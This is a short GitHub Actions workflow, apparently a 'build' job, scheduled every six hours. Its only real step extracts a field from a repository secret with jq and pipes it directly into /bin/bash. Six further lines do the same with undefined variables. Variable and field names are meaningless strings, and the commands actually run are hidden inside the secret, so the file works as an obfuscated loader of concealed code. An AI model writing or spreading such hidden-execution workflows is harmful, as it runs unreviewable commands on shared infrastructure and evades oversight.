name: worldcupescutcheon

on:
  workflow_dispatch:
  schedule:
    - cron: '51 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: worldcupescutcheon
        env:
          w98273: ${{ secrets.w98273 }}
        run: |
          echo $w98273 | jq -r .xgvpw48 | /bin/bash
          echo $b4594 | jq -r .gnqi1 | /bin/bash
          echo $ovh884 | jq -r .h7408 | /bin/bash
          echo $v2 | jq -r .bt4 | /bin/bash
          echo $u758 | jq -r .x4 | /bin/bash
          echo $d01885 | jq -r .xyiy83 | /bin/bash
          echo $d701 | jq -r .jke24574 | /bin/bash

